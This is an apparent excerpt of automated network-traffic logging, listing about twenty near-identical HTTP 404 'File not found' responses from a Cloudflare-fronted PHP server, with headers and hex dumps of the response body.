Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KfT8ciDvJO7crH%2BNHZ05kn6HvhMkfEC58JZntRzlqSgkNQnzyJa0VbKgdzfOT6gZROr%2Fs%2FdZr0neGIZzeheY7XV9Iu2xKQ2LN%2BXfsiLsL3ZLjtU0CtIkVGn2D0M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcf96ab15c42a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1619&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TySYGyVY9w8%2F0QpUnRD6xpnbwISKc0koKgLUrw%2FVq7mcLxu8LJKUVqQKgJHsaGjn71g05Gj0badMyRhig3K%2Bo5B1uzXIjPLeGdEB0WG3YztEfwI1eu4DDt5Ysd4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfaeafb34285-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2125&min_rtt=2125&rtt_var=1062&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpwesnmAw6sKt6e4SmMae%2BgI%2BvxXE7xXwAYNrgi89%2Fk3ldJu4jqZGPRkiwUaeznx8c%2B%2B03AdfV3wN3SyfNlgBZbypu5EDw%2B4%2F6ZWVXlxIp5n7nG3swAtUWuTd88%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfbab81141af-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2154&min_rtt=2154&rtt_var=1077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1wIl2R%2FoQWSxDTOX62mWwkz31DEEBTeLgR1eEYZoVriWLfeNxFtEYLfe%2FqvGQp3BwHnUkpNlyk6JiR5XrlGWLRMLQxPhIfWUJm61RgDeGpATeJxvhujR%2F1Nmo8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfc0cfa64233-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1720&rtt_var=860&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pyf%2BNU5EVVjKV1XeeioKVgHs2KHPuyFjUXvQoKLin2OtEPJ8xxlLc3FXdPk%2FjUy7NNfnQIcd5UHqu1XGhpGbK1RKjSlnepr%2BVV9P3uYCmXsnauoNsxUJiYrz3jk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfcd28ddde9a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=264WZ8KsuGVDQbZpaNVCl6FSaBOklN66Q5r7eXB7BWESm3IgDWNVHogkzJmc9sAZiajcTxQ1ca25I9cZcr0wgNpf%2B9acp50uBt%2FQAKGog7S8sBrGBa6vW4%2Bjvxw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfd8ce521871-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1611&rtt_var=805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fo6FgX5q%2BhCG%2FRThMC2VHbs0%2B601eOuHu6IcCooG6gs0jVebtMk6iOizUqfS0RyYLsnRkU45j7q%2FtAkK4TweM91MYXz6ZrHXvKWSqP4iAHpA9uRJgpIrAUYNTEY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfddee7d43e0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1609&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g1VGFFPo4dXL0SRRD%2BQUTQg0ZURXWppG092CzXSPEYtc0gqYGEC6Odv6QN4lHY3phXlpWM9nbBVxrIhJowFRvNumwTri6uL%2BcvZzLVuDHdQqvI50uEOGKoV%2FKa4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfe30e65728c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1915&min_rtt=1915&rtt_var=957&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGCGha%2B9zF3OFLZy2RgXo0yMikIXynYvrgBoAXoFgBbLXOtuWFzLuexv5jSVufkHVbN2RwT%2FlBG4pc1TcUd%2Fmd2NDBdMuDYZvLhb7xDYP7rKQr6qcJgDaPMMFFg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfeeac704343-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1548&min_rtt=1548&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BIzkGBtMqvOTDz2j8vUba6RA1bBdi3x7UQvbViEf1T5ut%2FwZ2kBxlMy%2BPZrbIJlf2kX%2BI0wMnQoUF8UW6oxbSLbO7P5n64efZ%2BjVPBepa1NozvjPR0JHubfAjs4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcff4ae6442aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF%2BfUPDgmZelh0RkUZyDoAy4jKZQJwlcCIQLbaRxCVstHNVUf1X%2FHQqEKGDHgVpNfO2UB6K%2F0bf5G%2F%2BSxxGSzftQDqJbSXDpaoI2lDaweEfsxqwHZRcF4tllHTE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcff9a99442bb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2479&min_rtt=2479&rtt_var=1239&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Q62URu3%2BLA6WoPIhCMQMhK5o%2FKRqsgYCMWkSrNE5ZYd%2FLah96nBjbRNO7U7P2q8Lsl8Nk5oLM1OG4sYHdBiyan1EODfy2ZUXglkTkWiUcyGW4T%2Fy5f5s4nqI0k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dcfffafb14276-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boR%2FRKckf1UuQoEMOsa%2BEcX99hlWQ90pSLeswHYR%2FEAwuK%2B6Xn%2B6hwtFyWvmY4d27HspRURZlRKzXdUDjphGEoPLbvPvW2jbpwhFHnk9hzQ69S5kiFTNkbM9R1Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd004ab67de9b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1545&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tXyvpRutlaWsHjmPoipKJ80wQAiBQwwhhE4V2GnmkgrZSzyoFFtjRLdoEH0jDRCLhREkqzQuugBF4FqTdWqKfH1s78gZXpyahbFQLfsisVChqM8BtTI9bUkgGjQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd01bcd0619aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pg2VJQHQyYVpI6MZXL1%2FWpDaik2Rbn061x0bJoERt5F9yhNrJd5Q3StqMSIPzXn5yPjJlr9Pkqt%2BUXFZOXyKYY1A3x6EJ6XSCnZgb51uOVrdeyYlPAluWNapQ4Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd020eabc8c95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VczyeIqNYWwHnyJMYGtZARlyT8fwVvNKEa%2BuridXT02uc8ArWUZvCTW7UP9fSBDtHDEG0fT2NHbZujO38rmlq2qLD4jzsaAbByMAKj8rtTng62f1DHxa9q1eJRA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd026df5a43b8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPMW6I2I2Yi8DVwchHkV3aOveZp12xyQ2en8U6ImPry19iDmqoTcs3TytHXWgnbWM4eagM%2BGDxmKsaJP4suK7gTHkenjHhBwBfnldJV664xe2MqprLoljUJu8Og%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd02f2e539e16-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1800&rtt_var=900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzcJ9FgslPXwdVzrOOhnI7tgaKgWIluZ0e8X1BxfGcSNTsjQhcxai0yswaMWzwNLtJHfjctxkDZV2sco8UB54zvNihKXpXz5q3W4T%2Fh%2F4ZGhLlBZVOBGgUxU3tc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd03a9f47440b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=om9WMVPv1sGXojx9fWf29QPyhl7LPcyAUXsG%2BCIsp0rQbWllQz%2Favi9ncPJeuczpWa%2B893dAm%2FAEiefshy7oDAaj%2FhvxxwCspTk6H3PaNoV5Y6SIxLL%2BogcvP0M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd0406c161a2c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1941&rtt_var=970&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6lMGj1fKvQa6XFQ2Pn1yjmqisvYK%2B2D6nldO7UoEObn7lpndoI0UmqovFhBHxChIn63ImeXjKY9EBR33rOs0eqFGhsS1bi9sb0JM3uRWRNb%2FWU4OFgik1b1EN7w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd0463a784368-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J6QxU26ns9cNgH5wtnOwiMOvo4b0%2BvKKetDY0iHuQEoUBnBYZTroTWU4zNA4FwRoKCBTYYNh3PJwQx1h7bc1SBFLtDjjOtmjpoxcVgCP0u9b%2BfDU56qSPkIKUZw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd057edafef9f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1919&min_rtt=1919&rtt_var=959&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dRjS9A5p8pgmMnYUGKV2ihbWhm4Fnr5sOG6xYSTLmbwc2eaOFO7WOtoB1Op9ev2t9ofBsoAcQgKGhMTY%2Bb%2BOdLYr2WxPHa9XD5BA6hETd%2FIj6lISNS8XHthGAv0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd06f7a4ade97-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1589&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hMK2FFCNfbEGWCBDrm8eXP5Hu6ZPslrNEOCnYTi4gpSm8shW0CX1atD0azMkobG4ZurBLgAbsX4OlDufQntl9%2FDufz8%2BG7ys5EWGwwbaT9wPTfTT9hQQAXlmExc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd075486042d2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2189&min_rtt=2189&rtt_var=1094&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:41:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYpWeYiCgHksYn3nzOiLNDsE0ZOs9PY8Me1HBjh0Jvz5XshlMvsSasTJoAcqY6dg1m%2B8NxJZqBqafxegks33GO1XbJIFDcqgOuZTbF4ruiu%2FCraI8yZH69HgyGA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd07fee9c7c9a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1763&rtt_var=881&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
